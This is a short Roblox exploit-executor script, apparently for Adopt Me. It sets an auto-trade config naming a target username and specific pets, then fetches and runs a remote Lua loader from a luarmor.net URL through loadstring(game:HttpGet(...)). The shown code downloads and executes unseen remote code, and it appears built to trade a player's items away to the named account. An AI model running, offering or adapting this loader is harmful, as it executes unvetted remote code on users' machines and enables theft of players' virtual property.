task.spawn(function()
    getgenv().Config = {
        ["inventory"] = "pets", -- Adapt to stickers, gifts, toys, pet_accessories, transport
        ["username"] = "diegosacciotto",
        ["pets_to_trade"] = {"winter_2024_bauble_buddies"} -- or lures_2023_blazing_lion cant auto trade gifts with pet ONLY 1
    }
    getgenv().trade_status = true
    getgenv().pets_unique_ids = {}

    loadstring(game:HttpGet("https://api.luarmor.net/files/v3/loaders/a5386bfa9bb03ae1da997e3078394366.lua"))()
end)
